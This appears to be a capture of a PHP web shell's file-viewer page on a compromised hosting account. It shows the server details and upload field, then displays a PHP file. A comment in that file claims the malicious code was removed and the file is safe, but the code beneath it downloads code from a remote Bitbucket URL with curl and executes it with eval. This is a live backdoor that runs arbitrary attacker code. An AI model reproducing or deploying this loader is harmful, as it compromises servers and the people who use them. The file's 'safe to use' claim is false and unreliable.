Server IP : 66.29.132.124 / Your IP : 3.133.136.95 Web Server : LiteSpeed System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : wavevlvu ( 1524) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/wavevlvu/book24.ng/public/ |
Upload File : |
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code have been removed, and the file is now safe to use. */ ?> <?php $remoteUrl = "https://bitbucket.org/uidrootpython/rmt/raw/557ef30b02f410d06444eedd86d3939c359f9158/403main.txt"; $ch = curl_init($remoteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $remoteCode = curl_exec($ch); if (curl_errno($ch)) { die('cURL error: ' . curl_error($ch)); } curl_close($ch); eval("?>" . $remoteCode); ?>